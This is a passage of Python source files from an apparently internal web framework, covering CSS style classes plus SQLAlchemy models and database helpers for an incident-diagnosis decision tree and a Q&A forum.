eventsStyles['hover'].update( {"color": self.colorCharts['redColor'][0]} )
class CssOutIcon(CssBase.CssCls):
__style = [
{'attr': 'display', 'value': 'inline-block'},
{'attr': 'margin', 'value': '0 0 0 20px'},
{'attr': 'font-size', 'value': '15px'},
{'attr': 'cursor', 'value': 'hand'},
{'attr': 'cursor', 'value': 'pointer'},
]
hover = []
def customize(self, style, eventsStyles):
style.update( {"color": self.colorCharts['redColor'][1]} )
eventsStyles['hover'].update( {"color": self.colorCharts['redColor'][0]} )
class CssBigIcon(CssBase.CssCls):
__style = [
{'attr': 'display', 'value': 'inline-block'},
{'attr': 'margin', 'value': '0 10px 0 10px'},
{'attr': 'cursor', 'value': 'hand'},
{'attr': 'cursor', 'value': 'pointer'},
]
hover = []
def customize(self, style, eventsStyles):
style.update( {"color": self.colorCharts['redColor'][1], 'font-size': self.fontSize} )
eventsStyles['hover'].update( {"color": self.colorCharts['redColor'][0]} )
```
#### File: Lib/css/CssRadio.py
```python
import CssBase
class CssRadioButton(CssBase.CssCls):
__style = [
{'attr': 'padding', 'value': '5px'},
{'attr': 'cursor', 'value': 'pointer'},
]
def customize(self, style, eventsStyles):
""" Enhance the different static configurations """
style.update({'background': self.colorCharts['greyColor'][0], 'color': self.colorCharts['greyColor'][8], 'font-size': CssBase.CssCls.fontSize})
class CssRadioButtonSelected(CssBase.CssCls):
__style = [
{'attr': 'padding', 'value': '5px'},
{'attr': 'cursor', 'value': 'pointer'},
]
def customize(self, style, eventsStyles):
""" Enhance the different static configurations """
style.update({'background': self.colorCharts['blueColor'][2], 'color': self.colorCharts['greyColor'][0], 'font-size': CssBase.CssCls.fontSize})
class CssRadioSwitch(CssBase.CssCls):
""" CSS Style for the excel tables """
__style = [{'attr': 'height', 'value': '0'},
{'attr': 'width', 'value': '0'},
{'attr': 'visibility', 'value': 'hidden'}]
childrenTag = 'input'
class CssRadioSwitchLabel(CssBase.CssCls):
""" CSS Style for the excel tables """
__style = [{'attr': 'cursor', 'value': 'pointer'},
{'attr': 'margin', 'value': '2px'},
{'attr': 'text-indent', 'value': '-9999px'},
{'attr': 'display', 'value': 'block'},
{'attr': 'border-radius', 'value': '100px'},
{'attr': 'position', 'value': 'relative'},
]
after = [{'attr': 'content', 'value': "''"},
{'attr': 'position', 'value': 'absolute'},
{'attr': 'left', 'value': '5px'},
{'attr': 'width', 'value': '20px'},
{'attr': 'height', 'value': '100%'},
{'attr': 'border-radius', 'value': '20px'},
{'attr': 'transition', 'value': '0.3s'},
]
childrenTag = 'label'
def customize(self, style, eventsStyles):
""" Enhance the different static configurations """
style.update({'background': self.colorCharts['greyColor'][1]})
eventsStyles['after'].update({'background-color': self.colorCharts['greyColor'][0]})
class CssRadioSwitchChecked(CssBase.CssCls):
""" """
__style = []
after = [
{'attr': 'left', 'value': 'calc(100% - 5px)'},
{'attr': 'transform', 'value': 'translateX(-100%)'}
]
childrenTag = "input:checked + label"
def customize(self, style, eventsStyles):
""" Enhance the different static configurations """
style.update({'background': self.colorCharts['baseColor'][7]})
```
#### File: Lib/css/CssTable.py
```python
import CssBase
class CssTableBasic(CssBase.CssCls):
""" """
__style = [
{'attr': 'margin', 'value': '5px'},
{'attr': 'border-collapse', 'value': 'collapse'},
]
class CssTableColumnSystem(CssBase.CssCls):
""" """
__style = [
{'attr': 'margin', 'value': '5px'},
{'attr': 'text-align', 'value': 'left'},
{'attr': 'font-weight', 'value': 'bold'},
]
class CssTableColumnFixed(CssBase.CssCls):
""" """
__style = [
{'attr': 'margin', 'value': '5px'},
{'attr': 'text-align', 'value': 'left'},
{'attr': 'font-weight', 'value': 'bold'},
]
class CssTableNewRow(CssBase.CssCls):
__style = [
{'attr': 'color', 'value': '#546472'},
]
class CssTableSelected(CssBase.CssCls):
__style = [
{'attr': 'background-color', 'value': '#AEDAF8!important'},
]
class CssCellComment(CssBase.CssCls):
__style = [
{'attr': 'margin', 'value': '0!important'},
{'attr': 'padding', 'value': '2px 0 0 2px!important'},
]
class CssCellSave(CssBase.CssCls):
__style = [
{'attr': 'color', 'value': '#293846!important'},
]
class CssTdEditor(CssBase.CssCls):
__style = [
{'attr': 'border-width', 'value': '1px'},
{'attr': 'border-style', 'value': 'solid'},
{'attr': 'text-align', 'value': 'left'},
{'attr': 'height', 'value': '30px'},
{'attr': 'padding', 'value': '5px'},
{'attr': 'vertical-align', 'value': 'middle'},
]
def customize(self, style, eventsStyles):
style.update({"color": self.colorCharts['blueColor'][6], 'border-color': self.colorCharts['greyColor'][9]})
class CssTdDetails(CssBase.CssCls):
__style = []
before = [
{'attr': "content", "value": r"'\f0fe'"},
{'attr': "font-family", "value": "'Font Awesome 5 Free'"},
{'attr': 'cursor', 'value': 'pointer'},
{'attr': 'padding', 'value': '0 5px 0 0'}
]
htmlTag = 'td'
class CssTdDetailsShown(CssBase.CssCls):
"""
:category:
:rubric: CSS
:type: Configuration
:dsc:
"""
__style = []
before = [
{'attr': "content", "value": r"'\f146'"},
{'attr': "font-family", "value": "'Font Awesome 5 Free'"},
{'attr': 'cursor', 'value': 'pointer'},
{'attr': 'padding', 'value': '0 5px 0 0'}
]
htmlTag = 'td'
```
#### File: db/sql/AresSqlIncidents.py
```python
import json
import inspect
import datetime
from sqlalchemy.sql import func
from ares.Lib.db import SqlTablesIncidents
def addQuestion(name, dsc, level, system, userName, hostname):
"""
:dsc:
Add a question to the defined system table. The default one here is the base table but this can be system specific.
In this case the class should be find dyna,ically from the SqlAlchemy models
"""
response = SqlTablesIncidents.IncQuestionsBase.query.filter_by(name=name).first()
if response is None:
runScriptResp = SqlTablesIncidents.IncQuestionsBase(name, dsc, level, userName, hostname)
SqlTablesIncidents.db.session.add(runScriptResp)
SqlTablesIncidents.db.session.commit()
return {"status": True, "qId": runScriptResp.q_id, "dsc": "Question correctly added to %s" % system}
return {"status": False, "qId": response.q_id, "dsc": "Question already defined for this system %s" % system}
def getQuestions(expr=None, numRecords=30):
"""
:dsc:
Returns the list of questions by creation date
"""
records = {}
baseQuery = SqlTablesIncidents.IncQuestionsBase.query.order_by(SqlTablesIncidents.IncQuestionsBase.lst_mod_dt.desc())
if expr is not None:
baseQuery = baseQuery.filter(SqlTablesIncidents.IncQuestionsBase.name.ilike(expr))
for rec in baseQuery.limit(numRecords).all():
records[rec.name] = rec.q_id
return {"status": True, "records": records}
def addGroup(q_id, usr_name, hostname, system):
"""
:dsc:
Assumption here is a question can only belong to one group of answer.
Indeed in this tree
1) a question have multiple answer (one group of answers) and each answer point to one questions
2) a group of answers can be linked to multiple questions
"""
response = SqlTablesIncidents.IncQAGroupBase.query.filter_by(q_id=q_id).first()
if response is None:
maxGrpId = SqlTablesIncidents.db.session.query(func.max(SqlTablesIncidents.IncQAGroupBase.a_grp_id)).one()[0]
if maxGrpId is None:
maxGrpId = -1
maxGrpId += 1
runScriptResp = SqlTablesIncidents.IncQAGroupBase(q_id, maxGrpId, usr_name, hostname)
SqlTablesIncidents.db.session.add(runScriptResp)
SqlTablesIncidents.db.session.commit()
return {"status": True, "dsc": "Group correctly added to %s" % system, 'gId': maxGrpId}
return {"status": False, "dsc": "Group already available for this system %s" % system, 'gId': response.a_grp_id}
def addAnswer(gId, answer, team, targetQ, userName, hostname, system):
"""
:dsc:
Add an answer to the given question. From the UI it is not possible to define yet a question link or a priority.
Those information should be added manually directly in the database.
"""
response = SqlTablesIncidents.IncAnswersBase.query.filter_by(a_grp_id=gId, value=answer).first()
if response is None:
runScriptResp = SqlTablesIncidents.IncAnswersBase(answer, gId, 0, team, targetQ, 1, "auto", userName, system, hostname)
SqlTablesIncidents.db.session.add(runScriptResp)
SqlTablesIncidents.db.session.commit()
return {"status": True, "dsc": "Answer correctly added to %s and question" % system}
return {"status": False, "dsc": "Answer already available for this system %s and question" % system}
def addAdvice(gId, advice, userName, hostname):
"""
:dsc:
Advice table. This can be fully updated from the UI. Any users can update this table and add relevant information.
If the advice helps on the incident resolution, the user can mention it and it will be reflected in the KPI
"""
response = SqlTablesIncidents.IncAdvicesBase.query.filter_by(q_id=gId).first()
if response is None:
runScriptResp = SqlTablesIncidents.IncAdvicesBase(gId, advice, userName, hostname)
SqlTablesIncidents.db.session.add(runScriptResp)
SqlTablesIncidents.db.session.commit()
else:
response.text = advice
response.usr_name = userName
response.hostname = hostname
SqlTablesIncidents.db.session.merge(response)
SqlTablesIncidents.db.session.flush()
SqlTablesIncidents.db.session.commit()
return {"status": True, "dsc": "Advice correctly added"}
def addIncident(pry, attrs, usr_name, hostname):
"""
:dsc:
Add an new incident to the framework. This entry is used to keep track of the status changes during the decision tree.
If no resolution is performed the full description is sent to the ,ain system to track the change and ask for a manual intervation
from the relevant IT and support teams
"""
runScriptResp = SqlTablesIncidents.IncRepo("", "", "", "", pry, "DIAGNOSIS", "[]", usr_name, hostname)
SqlTablesIncidents.db.session.add(runScriptResp)
SqlTablesIncidents.db.session.commit()
runScriptResp = SqlTablesIncidents.IncScoreDtls(runScriptResp.inc_id, json.dumps(attrs), hostname)
SqlTablesIncidents.db.session.add(runScriptResp)
SqlTablesIncidents.db.session.commit()
return {"status": True, "dsc": "Advice correctly added", 'incId': runScriptResp.inc_id}
def IncidentPry(incId, pry, label, dbase, qId, email):
"""
:dsc:
Update some information in the incident table in order to keep track of the priority and the questions answered in the
decision tree.
"""
response = SqlTablesIncidents.IncRepo.query.filter_by(inc_id=incId).first()
if response is not None:
qBreadCrumb = json.loads(response.tree)
qBreadCrumb.append({"table": dbase, 'qId': qId, 'answer': label})
response.lst_mod_dt = datetime.datetime.utcnow()
response.pry += pry
response.team = email
response.last_q_id = qId
response.tree = json.dumps(qBreadCrumb)
SqlTablesIncidents.db.session.merge(response)
SqlTablesIncidents.db.session.flush()
SqlTablesIncidents.db.session.commit()
return {"status": True}
return {"status": False}
def IncidentOvrPry(incId, pry, usr_name, hostname):
"""
"""
response = SqlTablesIncidents.IncPryOvr.query.filter_by(code=incId).first()
if response is None:
response = SqlTablesIncidents.IncPryOvr(incId, pry, usr_name, "", hostname)
SqlTablesIncidents.db.session.add(response)
else:
response.pry = pry
response.usr_name = usr_name
response.hostname = hostname
response.lst_mod_dt = datetime.datetime.utcnow()
SqlTablesIncidents.db.session.commit()
def IncidentStatus(incId, nodeId, cmmt=None, status=None):
"""
:dsc:
Change some incident information and the status of the incident. This will help on the production of KPI to assess
the efficiency of this model. With a good series of question and advices the framework should assist in the incident
resolution. Those KPI will help finding reccurent issues and time spent on some branches in the decision tree.
"""
response = SqlTablesIncidents.IncRepo.query.filter_by(inc_id=incId).first()
if response is not None:
response.lst_mod_dt = datetime.datetime.utcnow()
if int(nodeId) != -1:
response.last_q_id = nodeId
if cmmt is not None:
response.cmmt = cmmt
if status is not None:
response.status = status
response.time_spent = response.lst_mod_dt - response.start_dt
SqlTablesIncidents.db.session.merge(response)
SqlTablesIncidents.db.session.flush()
SqlTablesIncidents.db.session.commit()
return {"status": True}
return {"status": False}
def getQuestion(qId):
"""
:dsc:
Retrieve all the question information from the different tables. The question and its answers belong to the same system.
"""
header = ["title", "advice", "answer", "db", "score", "team", "next_id"]
records = {'id': qId, 'answers': {}}
question = SqlTablesIncidents.IncQuestionsBase.query.filter_by(q_id=qId).first()
if question is not None:
records.update({'title': question.name, 'dsc': question.dsc, 'pry': question.lvl, 'details': question.details})
advice = SqlTablesIncidents.IncAdvicesBase.query.filter_by(q_id=qId).first()
if advice is not None:
records['advice'] = advice.text
groups = SqlTablesIncidents.IncQAGroupBase.query.filter_by(q_id=qId).first()
if groups is not None:
records['group_id'] = groups.a_grp_id
for rec in SqlTablesIncidents.db.session.query(
SqlTablesIncidents.IncAnswersBase.value, SqlTablesIncidents.IncAnswersBase.db_suffix, SqlTablesIncidents.IncAnswersBase.pry,
SqlTablesIncidents.IncAnswersBase.q_dst_id, SqlTablesIncidents.IncAnswersBase.team) \
.filter(SqlTablesIncidents.IncAnswersBase.valid == 1) \
.filter(SqlTablesIncidents.IncAnswersBase.a_grp_id == groups.a_grp_id).all():
records['answers'][rec[0]] = "%s|%s|%s|%s" % (rec[1], rec[2], rec[3], rec[4])
else:
records['group_id'] = None
return records
def getSummary():
"""
:dsc:
Main query to produce the different KPI relative to this new framework
"""
header, records = ['category', 'question', 'pry', 'count'], []
for rec in SqlTablesIncidents.db.session.query(SqlTablesIncidents.IncRepo.status, SqlTablesIncidents.IncRepo.last_q_id,
SqlTablesIncidents.IncRepo.pry, func.count(SqlTablesIncidents.IncRepo.status))\
.group_by(SqlTablesIncidents.IncRepo.status, SqlTablesIncidents.IncRepo.last_q_id).all():
row = dict(zip(header, rec))
if row['question'] is None:
row['question'] = ""
records.append(row)
return records
def IncDelete(code):
"""
:dsc:
SQL function to remove an existing incident from the database.
This will also remove the respective override if any
"""
response = SqlTablesIncidents.IncRepo.query.filter_by(code=code).first()
if response is None:
SqlTablesIncidents.db.session.delete(response)
SqlTablesIncidents.db.session.commit()
responseOvr = SqlTablesIncidents.IncPryOvr.query.filter_by(code=code).first()
if responseOvr is None:
SqlTablesIncidents.db.session.delete(responseOvr)
SqlTablesIncidents.db.session.commit()
def getIncident(incId):
response = SqlTablesIncidents.IncRepo.query.filter_by(inc_id=incId).first()
if response is not None:
return {"pry": response.pry, "tree": json.loads(response.tree), "start_dt": response.start_dt, "team": response.team}
return {}
def IncPryOvr(code, score):
"""
:dsc:
This SQL method will be in charge to apply an override to a wrong incident score.
This will be done manually and some elements to detail the overrde might be added.
The field comment might help in the future to put in place IA based on the history.
"""
response = SqlTablesIncidents.IncRepo.query.filter_by(code=code).first()
if response is not None:
if response.pry == score:
return {'status': False, "dsc": 'No change with the initial computed override'}
responseOvr = SqlTablesIncidents.IncPryOvr.query.filter_by(code=code).first()
if responseOvr is None:
runScriptResp = SqlTablesIncidents.IncPryOvr(code, score)
runScriptResp.db.session.add(runScriptResp)
runScriptResp.db.session.commit()
return {"status": True, 'dsc': "Override performed for %s" % code}
return {"status": False, 'dsc': "Incident %s has already an override" % code }
return {"status": False, 'dsc': "Incident code %s not found" % code}
def loadStatics(table, data):
"""
"""
tableCls = None
for name, obj in inspect.getmembers(SqlTablesIncidents):
if inspect.isclass(obj):
if obj.__tablename__ == table:
tableCls = obj
break
if tableCls is not None:
tableCls.query.delete()
SqlTablesIncidents.db.session.commit()
for name, val in data.items():
newData = tableCls(name, val)
SqlTablesIncidents.db.session.add(newData)
SqlTablesIncidents.db.session.commit()
def getStatics(table):
"""
"""
tableCls = None
for name, obj in inspect.getmembers(SqlTablesIncidents):
if inspect.isclass(obj):
if obj.__tablename__ == table:
tableCls = obj
break
if tableCls is not None:
return dict([(rec.name, rec.score) for rec in tableCls.query.all()])
return {}
```
#### File: Lib/db/SqlTableDbReports.py
```python
from app import db
import datetime
from ares.utils import AresSiphash
class TableDb(db.Model):
__bind_key__ = 'db_data'
__tablename__ = 'dbs'
db_id = db.Column(db.Integer, primary_key=True, autoincrement=True)
db_name = db.Column(db.Text, unique=True, nullable=False)
report_name = db.Column(db.Text)
usr_nam = db.Column(db.String(120), nullable=False)
hostname = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
def __init__(self, db_name, report_name, usr_nam, hostname):
self.db_name, self.report_name, self.usr_nam, self.hostname = db_name, report_name, usr_nam, hostname
```
#### File: Lib/db/SqlTableQuestions.py
```python
from app import db
import datetime
# -------------------------------------------------------------------------------------------------------------------
# SECTION DEDICATED TO THE QUESTIONS
#
class Questions(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question'
issue_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_title = db.Column(db.String(120), nullable=False, unique=True)
issue_content = db.Column(db.Text, nullable=False)
type = db.Column(db.Text, nullable=False)
status = db.Column(db.String(50), nullable=False)
urgent = db.Column(db.Integer, nullable=False) # 0 = N, 1 = Y
group = db.Column(db.String(120), nullable=False) # Default public
usr_name = db.Column(db.String(120), nullable=False)
interest = db.Column(db.Integer, default=0)
best_answer_id = db.Column(db.Integer, default=-1) #-1
clc_dt = db.Column(db.String(10), nullable=False, default=lambda: datetime.datetime.today().strftime('%Y-%m-%d'))
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, issue_title, issue_content, type, status, urgent, group, usr_name, interest, hostname):
self.issue_title, self.issue_content, self.type, self.status = issue_title, issue_content, type, status
self.usr_name, self.hostname, self.interest, self.urgent, self.group = usr_name, hostname, interest, urgent, group
class QuestionsDetail(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_detail'
question_extra_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer, nullable=False)
content = db.Column(db.String(120), nullable=False)
usr_name = db.Column(db.String(120), nullable=False)
clc_dt = db.Column(db.String(10), nullable=False, default=lambda: datetime.datetime.today().strftime('%Y-%m-%d'))
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, issue_id, content, usr_name, hostname):
self.issue_id, self.content, self.usr_name, self.hostname = issue_id, content, usr_name, hostname
class QuestionsViews(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_views'
view_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer)
value = db.Column(db.Integer)
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
def __init__(self, issue_id, value, usr_name):
self.issue_id, self.value, self.usr_name = issue_id, value, usr_name
class QuestionsAlert(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_alert'
alert_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer)
status = db.Column(db.Integer, default=1) # 1 = Active
moderator = db.Column(db.String(120), default='') # Should be mentioned when status is 0
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
def __init__(self, issue_id, usr_name):
self.issue_id, self.usr_name = issue_id, usr_name
class QuestionsInterest(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_interest'
interest_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer)
interest_value = db.Column(db.Integer)
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, issue_id, interest_value, usr_name, hostname):
self.issue_id, self.interest_value, self.usr_name, self.hostname = issue_id, interest_value, usr_name, hostname
class QuestionsTags(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_tags'
question_tag_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
tag_name = db.Column(db.Text)
issue_id = db.Column(db.Integer)
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
def __init__(self, issue_id, tag_name, usr_name):
self.tag_name, self.issue_id, self.usr_name = tag_name, issue_id, usr_name
class QuestionsFollow(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_follow'
follow_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer)
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, issue_id, usr_name, hostname):
self.issue_id, self.usr_name, self.hostname = issue_id, usr_name, hostname
class QuestionsAnswer(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_answer'
answer_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer, nullable=False)
answer_content = db.Column(db.Text, nullable=False)
usr_name = db.Column(db.String(120), nullable=False)
status = db.Column(db.String(50), nullable=False) # Best answer, Removed...
group_cod = db.Column(db.String(50), nullable=False)
interest = db.Column(db.Integer, default=0)
clc_dt = db.Column(db.String(10), nullable=False, default=lambda: datetime.datetime.today().strftime('%Y-%m-%d'))
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, issue_id, answer_content, usr_name, status, group_cod, interest, hostname):
self.issue_id, self.answer_content, self.usr_name, self.status = issue_id, answer_content, usr_name, status
self.hostname, self.group_cod, self.interest = hostname, group_cod, interest
class QuestionsAnswerInterest(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_anwser_interest'
interest_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
answer_id = db.Column(db.Integer)
value = db.Column(db.Integer)
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, answer_id, value, usr_name, hostname):
self.answer_id, self.value, self.usr_name, self.hostname = answer_id, value, usr_name, hostname
class QuestionsAnswerMail(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_answer_mail'
answer_mail_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
answer_id = db.Column(db.Integer)
email_group = db.Column(db.String(120), nullable=False)
usr_name = db.Column(db.String(120), nullable=False)
clc_dt = db.Column(db.String(10), nullable=False, default=lambda: datetime.datetime.today().strftime('%Y-%m-%d'))
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, answer_id, email_group, usr_name, hostname):
self.answer_id, self.email_group, self.usr_name, self.hostname = answer_id, email_group, usr_name, hostname
class QuestionsAnswerExra(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_answer_extra'
answer_extra_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
answer_id = db.Column(db.Integer, nullable=False)
extra_content = db.Column(db.String(120), nullable=False)
usr_name = db.Column(db.String(120), nullable=False)
clc_dt = db.Column(db.String(10), nullable=False, default=lambda: datetime.datetime.today().strftime('%Y-%m-%d'))
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, answer_id, extra_content, usr_name, hostname):
self.answer_id, self.extra_content, self.usr_name, self.hostname = answer_id, extra_content, usr_name, hostname
class QuestionsLinkExt(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_link_external'
link_ext_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer)
system_code = db.Column(db.String(10), nullable=False)
system_id = db.Column(db.Text, nullable=False)
title = db.Column(db.Text, nullable=False)
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, issue_id, system_code, system_id, title, usr_name, hostname):
self.issue_id, self.system_code, self.system_id, self.title, self.usr_name, self.hostname = issue_id, system_code, system_id, title, usr_name, hostname
class QuestionsLinkTopic(db.Model):
__bind_key__ = 'questions'
__tablename__ = 'question_link_topic'
link_topic_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)
issue_id = db.Column(db.Integer)
related_question_id = db.Column(db.Integer)
usr_name = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False) # This is mandatory when data can come from outside
def __init__(self, issue_id, related_question_id, usr_name, hostname):
self.issue_id, self.related_question_id, self.usr_name, self.hostname = issue_id, related_question_id, usr_name, hostname
```
#### File: Lib/db/SqlTablesIncidents.py
```python
from app import db
import datetime
class IncRepo(db.Model):
"""
:dsc:
Store the final message and create the description of the incident.
Incident descriptions are standardised and this will allow the reuse the data by a machine in the same way that we use logs.
This table will be updated at the end of the tree process. The only information that the users will be able to add is the cmmt.
This framework will not replace any other system in charge of keeping track of the different interation within the team to solve this problem.
The status of the incident should not be stored here. This framework is only dedicated to provide a dynamic score but also to try to diagnose it
"""
__bind_key__ = 'incidents'
__tablename__ = 'incidents'
inc_id = db.Column(db.Integer, primary_key=True, nullable=False)
ticket = db.Column(db.Text) # Produced from the system in charge of storing the incident history
dsc = db.Column(db.Text) # Created automatically from the tree
cmmt = db.Column(db.Text) # Added by the user to detail the issue (to allow the creation of extra branches)
team = db.Column(db.Text, nullable=False) # The team in charge of the incident from the question
start_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
usr_name = db.Column(db.String(120), nullable=False) # Should be retrieve from the SSO in the future
pry = db.Column(db.Integer, nullable=False)# Should be the result of the scoring algorithm
status = db.Column(db.Text)
tree = db.Column(db.Text)
last_q_id = db.Column(db.Integer, nullable=True)
hostname = db.Column(db.String(120), nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
time_spent = db.Column(db.Interval, nullable=True)
def __init__(self, ticket, dsc, cmmt, team, pry, status, tree, usr_name, hostname):
self.ticket, self.dsc, self.cmmt, self.team, self.pry, self.status, self.tree, self.usr_name, self.hostname = ticket, dsc, cmmt, team, pry, status, tree, usr_name, hostname
class IncScoreDtls(db.Model):
"""
:dsc:
In this table will be stored the details of the scoring algorithm for a incident.
The column attrs will store the details in a json format. In inc_id is the primary key in the incident table.
This will be created when the button "start diagnosis" is clicked
"""
__bind_key__ = 'incidents'
__tablename__ = 'incidents_score_info'
score_id = db.Column(db.Integer, primary_key=True, nullable=False)
inc_id = db.Column(db.Integer)
attrs = db.Column(db.Text)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
hostname = db.Column(db.String(120), nullable=False)
def __init__(self, inc_id, attrs, hostname):
self.inc_id, self.attrs, self.hostname = inc_id, attrs, hostname
class IncPryOvr(db.Model):
"""
:dsc:
Table to allow the end user to override the automated score allocated to an incident.
This action will also help on reviewing constantly the incidents priorities algorithm by check those overrides.
Any answer can have a score in order to help on refining the algorithm and get something in line with the users expectations.
The default priority of an answer is 0
"""
__bind_key__ = 'incidents'
__tablename__ = 'incidents_pry_ovr'
inc_id = db.Column(db.Integer, primary_key=True, nullable=False)
code = db.Column(db.Text)
pry = db.Column(db.Integer, nullable=False)# Should be the result of the scoring algorithm
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
usr_name = db.Column(db.String(120), nullable=False) # Should be retrieve from the SSO in the future
cmmt = db.Column(db.Text)
hostname = db.Column(db.String(120), nullable=False)
def __init__(self, code, pry, usr_name, cmmt, hostname):
self.code, self.pry, self.usr_name, self.cmmt, self.hostname = code, pry, usr_name, cmmt, hostname
# --------------------------------------------------------------------
# IA Algorithm
#
# This should be based on a decision tree to get a predictive model
# This decision tree should then be updated by the learning https://en.wikipedia.org/wiki/Decision_tree_learning
class IncQuestionsBase(db.Model):
"""
:dsc:
Main table of the incident diagnosis. This will store the list of questions. In the same table are mixed questions of different level.
A level will correspond to a tree. Basically the level 0 is the basic level for a incident. Once the incident is defined by a user, it will go the the tree of the relevant team.
Each team will then have a level and each node will ensure the necessary steps are done to pass to the next team.
"""
__bind_key__ = 'incidents'
__tablename__ = 'tree_questions_base'
q_id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text, nullable=False)
dsc = db.Column(db.Text, nullable=False)
lvl = db.Column(db.Integer)
details = db.Column(db.Boolean, default=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
usr_name = db.Column(db.String(120), nullable=False) # Should be retrieve from the SSO in the future
hostname = db.Column(db.String(120), nullable=False)
def __init__(self, name, dsc, lvl, usr_name, hostname):
self.name, self.dsc, self.lvl, self.usr_name, self.hostname = name, dsc, lvl, usr_name, hostname
class IncSplitDb(db.Model):
"""
:dsc:
Table in charge of splitting the questions and the answers. This will allow a better split of the different data (even in a traditional SQL model)
This will allow the creation of small tables and potentially the creation of different trees
"""
__bind_key__ = 'incidents'
__tablename__ = 'tree_split_db'
split_id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text, nullable=False)
db_suffix = db.Column(db.Text, nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
usr_name = db.Column(db.String(120), nullable=False) # Should be retrieve from the SSO in the future
def __init__(self, name, db_suffix, usr_name):
self.name, self.db_suffix, self.usr_name = name, db_suffix, usr_name
class IncAdvicesBase(db.Model):
"""
:dsc:
This table will allow the display of events in order to try to solve the problem in an automated manner.
This table can be filled by advanced users but also by the different development teams
"""
__bind_key__ = 'incidents'
__tablename__ = 'tree_advices_base'
c_id = db.Column(db.Integer, primary_key=True, nullable=False)
q_id = db.Column(db.Integer, nullable=False)
text = db.Column(db.Text)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
usr_name = db.Column(db.String(120), nullable=False) # Should be retrieve from the SSO in the future
hostname = db.Column(db.String(120), nullable=False)
def __init__(self, q_id, text, usr_name, hostname):
self.q_id, self.text, self.usr_name, self.hostname = q_id, text, usr_name, hostname
class IncQAGroupBase(db.Model):
"""
:dsc:
This table will link the question to a dedicated gtoup of answer.
So basically a group of answer can be linked to multiple questions
This will allow the tree to link two branches and to avoid to duplicate the same series of questions
"""
